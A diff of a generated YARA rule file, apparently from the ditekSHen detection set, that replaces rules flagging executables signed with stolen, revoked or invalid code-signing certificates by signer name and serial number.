+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_06De439Ba2Df4Dcd8240C211D60Cdf5E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5B440A47E8Ce3Dd202271E5C7A666C78 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "90623074-58ac-51fd-9b80-881d3187dc74"
+		id = "62c9a37c-e4dd-5925-a019-08bf6a77476d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7400-L7412"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2053-L2064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2847853e2e9cc9e6909871b3f8e6de399fb76353e997b084c92dbcfe6c1a48f"
+		logic_hash = "f898a3495e173d85fd62598da87ab15cbee0674519231a5e770204a4db3cd93f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2650a1205bd7720381c00bdee5aede0ee333dc13"
-		hash1 = "e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1"
+		thumbprint = "07e4cbdd52027e38b86727e88b33a0a1d49fe18f5aee4101353dd371d7a28da5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microleaves LTD" and pe.signatures [ i ] . serial == "06:de:43:9b:a2:df:4d:cd:82:40:c2:11:d6:0c:df:5e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00F454F2Fdc800B3454059D8889Bd73D67 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fe41941464B9992A69B7317418Ae8Eb7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "277ac503-91c4-5266-b8a4-c01a48b8df4d"
+		id = "44626304-7f68-5d3a-81b4-91ee0bd09cc3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7414-L7429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2066-L2077"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "91b33a3e915a007d00482905471e124045a373fef9c8b0fe9a987196d2ec013a"
+		logic_hash = "713a2cfc95b83de71064e198b26b716790c7cf21674961720695ab6749cb2ad1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2b560fabc34e0db81dae1443b1c4929eef820266"
-		hash1 = "e58b80e4738dc03f5aa82d3a40a6d2ace0d7c7cfd651f1dd10df76d43d8c0eb3"
+		thumbprint = "ef4da71810fb92e942446ee1d9b5f38fea49628e0d8335a485f328fcef7f1a20"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAUTY CORP SRL" and ( pe.signatures [ i ] . serial == "f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" or pe.signatures [ i ] . serial == "00:f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3Afe693728F8406054A613F6736F89E3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_29128A56E7B3Bfb230742591Ac8B4718 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "64c4157e-2183-5f41-b938-df29e210ee80"
+		id = "58a9e9f1-531b-5dee-aa11-1537838e9d3f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7431-L7443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2079-L2090"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6993a13546a1eff8a4f770f224a14bffe7e3393f628337cff27cbf57ebab2a65"
+		logic_hash = "16c9843b5e3edafa64e07626fda494452efa5d0bcaa80d7d80683258c2b9acd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "89528e9005a635bcee8da5539e71c5fc4f839f50"
-		hash1 = "d98bdf3508763fe0df177ef696f5bf8de7ff7c7dc68bb04a14a95ec28528c3f9"
+		thumbprint = "f9fcc798e1fccee123034fe9da9a28283de48ba7ae20f0c55ce0d36ae4625133"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROB ALDERMAN FITNESS LIMITED" and pe.signatures [ i ] . serial == "3a:fe:69:37:28:f8:40:60:54:a6:13:f6:73:6f:89:e3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Fd7F9Cac1E9Ce71Ac757F93266E3B13 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C2Bb11Cfc5E80Bf4E8Db2Ed0Aa7E50C5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6021f566-e297-5af4-b692-663480091296"
+		id = "d22ee868-71a7-52f4-93f3-b04b105fd399"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7445-L7457"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2092-L2103"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "319f858a15f8752d7637ab7036ed89b17c501c2422769339578e685fe6a57eea"
+		logic_hash = "e54eeea70e85396b26fe188b848ef37c619aae5fc909c1a06ad0bc42fb9b0468"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "af2779ceb127caa6c22232ad359888a0a71ce221"
-		hash1 = "7c28b994aeb3a85e37225cc20bae2232f97e23f115c2a409da31f353140c631e"
+		thumbprint = "f1044e01ff30d14a3f6c89effae9dbcd2b43658a3f7885c109f6e22af1a8da4b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9D\\x92\\xE5\\xB2\\x9B\\xE4\\xB8\\x89\\xE5\\x96\\x9C\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0f:d7:f9:ca:c1:e9:ce:71:ac:75:7f:93:26:6e:3b:13" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rooth Media Enterprises Limited" and pe.signatures [ i ] . serial == "00:c2:bb:11:cf:c5:e8:0b:f4:e8:db:2e:d0:aa:7e:50:c5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Fbf16A33D26390A15F046C310030Cf0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_040Cc2255Db4E48Da1B4F242F5Edfa73 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6c010106-141d-5121-9594-73edc872a381"
+		id = "4673a61f-1c2b-5f92-af28-d55b5d913784"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7459-L7471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2105-L2116"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc68fe14ec70de74a6dae7891dfbb82ee7974f37469cfa72d735e70e9194c405"
+		logic_hash = "ade204ebb2bf26515984d20ae459aaea56136acfd37a54abc794969fd05c54ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "61f422db86bbc5093b1466a281f13346f8d81792"
-		hash1 = "f45e5f160a6de454d1db21b599843637103506545183a30053d03b609f92bbdc"
+		thumbprint = "1270a79829806834146ef50a8036cfcc1067e0822e400f81073413a60aa9ed54"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Softland SRL" and pe.signatures [ i ] . serial == "04:0c:c2:25:5d:b4:e4:8d:a1:b4:f2:42:f5:ed:fa:73" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_292Eb1133507F42E6F36C5549C189D5E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "60d3cc6e-bf58-55ae-a13b-0e22ecc8d5cd"
+		id = "decdae98-333f-58b3-8c48-b997da5fc3f3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7473-L7485"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2118-L2129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "456a09b1939d3f60e6ef735631eb681a9d15ea573552672fd14b19f60e8d8c73"
+		logic_hash = "9981e0aed672ebfcbe7f0bc1eee6a26a1523b8577d5ee572612aaebf23d1fbcf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "48c32548ff651e2aac12716efb448f5583577e35"
-		hash1 = "f0b3b36086e58964bf4b9d655568ab5c7f798bd89e7a8581069e65f8189c0b79"
+		thumbprint = "45d598691e79be3c47e1883d4b0e149c13a76932ea630be429b0cfccf3217bc2"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2Aaa455A172F7E3A2Dffb5C6B14F9C16 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_091736D368A5980Ebeb433A0Ecb49Fbb : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "81c115a7-7ddf-58ba-b56e-a92652c7f217"
+		id = "fb9446b5-2d49-51de-bedb-ea541d415ae2"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7487-L7499"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2131-L2142"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd10d388e9122585c8e5b2073725f50edbc85d0ca1e94a4b034e500e0e89b608"
+		logic_hash = "858a98ba8fd3244b2c0f6d3dd89a294b0187dd1a82cdcca67c162985d80ca6ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23c91b66bd07e56e60724b0064d4fedbdb1c8913"
-		hash1 = "7852cf2dfe60b60194dae9b037298ed0a9c84fa1d850f3898751575f4377215f"
+		thumbprint = "b1c1dc94f0c775deeb46a0a019597c4ac27ab2810e3b3241bdc284d2fccf3eb5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM VILLAGE s.r.o." and pe.signatures [ i ] . serial == "2a:aa:45:5a:17:2f:7e:3a:2d:ff:b5:c6:b1:4f:9c:16" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELEKSIR, OOO" and pe.signatures [ i ] . serial == "09:17:36:d3:68:a5:98:0e:be:b4:33:a0:ec:b4:9f:bb" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1Ef6392B2993A6F67578299659467Ea8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E48Cb3314977D77Dedcd4C77Dd144C50 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5539ca9-d5cc-538e-8e53-3274791bfa2b"
+		id = "9b708e1b-a878-5244-8fe2-3061f058a9ab"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7501-L7513"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2144-L2155"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eabfeb7abc968188276ba76cd94bd80aba340f5f920881fe13c0f7b093d65a55"
+		logic_hash = "a2ca0ce3812be5e46cb0bc9c73fc4f31294c8d594ca821ad924a3f06cf2430ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e87d3e289ccb9f8f9caa53f2aefba102fbf4b231"
-		hash1 = "8282e30e3013280878598418b2b274cadc5e00febaa2b93cf25bb438ee6eb032"
+		thumbprint = "025bce0f36ec5bac08853966270ed2f5e28765d9c398044462a28c67d74d71e1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BESPOKE SOFTWARE SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "00:e4:8c:b3:31:49:77:d7:7d:ed:cd:4c:77:dd:14:4c:50" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0F007898Afcba5F8Af8Ae65D01803617 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1E72A72351Aecf884Df9Cdb77A16Fd84 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1c3fddc2-3348-5f94-bf3e-5ce95b6ef009"
+		id = "7972befe-3a88-5ea5-a865-3d008b712bc9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7515-L7527"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2157-L2168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "260dbdd3d295ace9c478cc27061065803c159957a1eb2f7965ee2b358f02a73c"
+		logic_hash = "6555b89f1643f2e461a936df402dcbe8dd5100a1def76c7c6d8f792d1c0ed006"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5687481a453414e63e76e1135ed53f4bd0410b05"
-		hash1 = "815f1f87e2df79e3078c63b3cb1ffb7d17fd24f6c7092b8bbe1f5f8ceda5df22"
+		thumbprint = "f945bbea1c2e2dd4ed17f5a98ea7c0f0add6bfc3d07353727b40ce48a7d5e48f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buket and Co." and pe.signatures [ i ] . serial == "1e:72:a7:23:51:ae:cf:88:4d:f9:cd:b7:7a:16:fd:84" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aa1D84779792B57F91Fe7A4Bde041942 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B383658885E271129A43D19De40C1Fc6 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "57b4741a-a23d-51aa-ad83-3a7d80368290"
+		id = "47389dc4-8092-5e12-91a1-f370c9c507a9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7529-L7543"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2170-L2181"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e57d646910c570f421939fd0d47ddee60bc38bb2ca2ba1991bf334cf8d5574b"
+		logic_hash = "9312bc8f1005d71393ab63f05bdabff52752ad939dd4311485dc4b56f75eece9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6c15651791ea8d91909a557eadabe3581b4d1be9"
+		thumbprint = "ef234051b4b83086b675ff58aca85678544c14da39dbdf4d4fa9d5f16e654e2f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elekon" and pe.signatures [ i ] . serial == "00:b3:83:65:88:85:e2:71:12:9a:43:d1:9d:e4:0c:1f:c6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0690Ee21E99B1Cb3B599Bba7B9262Cdc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ca7D54577243934F665Fd1D443855A3D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0fa2103e-c04e-5380-b4e3-6ac35f0b71d8"
+		id = "8519119d-a37b-5438-a642-48e1d40024b8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7545-L7556"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2183-L2194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bc2aac1bd21f80d4233af37028820a36ebd56bceed9b1318e99e75b28b9408e3"
+		logic_hash = "867844464609a043902f07aad3fa568b482259655bc181d992bd409437165790"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ff9a35ef5865024e49096672ab941b5c120657b9"
+		thumbprint = "2ea2c7625c1a42fff63f0b17cfc4fd0c0f76d7eb45a86b18ec9a630d3d8ad913"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xiamen Tongbu Networks Ltd." and pe.signatures [ i ] . serial == "06:90:ee:21:e9:9b:1c:b3:b5:99:bb:a7:b9:26:2c:dc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FABO SP Z O O" and pe.signatures [ i ] . serial == "00:ca:7d:54:57:72:43:93:4f:66:5f:d1:d4:43:85:5a:3d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7709D2Df39E9A4F7Db2F3Cbc29B49743 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "41423db4-c475-558b-9a27-2b0ea59102ad"
+		id = "55e8815f-0885-5eb0-bf85-05bbd874a821"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7558-L7569"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2196-L2207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0fc85d3d01b37ff7870cade6f8e0e756593ff0b5c9eea3b687ff52985caa20dd"
+		logic_hash = "b63fa6e4e92549ae92b9a414390471c49fd50010bb7e10e1db72ff53370a6354"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c58bc4370fa01d9a7772fa8c0e7c4c6c99b90561"
+		thumbprint = "04349ba0f4d74f46387cee8a13ee72ab875032b4396d6903a6e9e7f047426de8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00881573Fc67Ff7395Dde5Bccfbce5B088 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_186D49Fac34Ce99775B8E7Ffbf50679D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "10ef1865-9267-5f06-a1d5-9196b00f3dc6"
+		id = "eeea3085-9fd7-5077-8c13-e0c4438b2e79"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7571-L7585"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2209-L2220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5b137cccecb16ad116b73fa1f9025f76846b85009fbd4962956499031d6eff35"
+		logic_hash = "950b14787e707be843d1443a612c372ceb0c2830de20bce1f62317fa39149e5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "31b3a3c173c2a2d1086794bfc8d853e25e62fb46"
+		thumbprint = "812a80556775d658450362e1b3650872b91deba44fef28f17c9364add5aa398e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_15C5Af15Afecf1C900Cbab0Ca9165629 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0097Df46Acb26B7C81A13Cc467B47688C8 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "795fa78b-0cd4-5eb4-9d37-72b5c38e7466"
+		id = "1c281766-abd4-534b-9442-233369e1f55e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7587-L7599"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2222-L2233"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cfc72a85954cb12d89a09b47b5937216a7cfee4a71ac6335a2a94faadea1f68c"
+		logic_hash = "ab4da0ddd001acf9f8d78c4beb28c648f8516088561e3140739b4b41d93b58ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "69735ec138c555d9a0d410c450d8bcc7c222e104"
-		hash1 = "2ae575f006fc418c72a55ec5fdc26bc821aa3929114ee979b7065bf5072c488f"
+		thumbprint = "54c4929195fafddfd333871471a015fa68092f44e2f262f2bbf4ee980b41b809"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" )
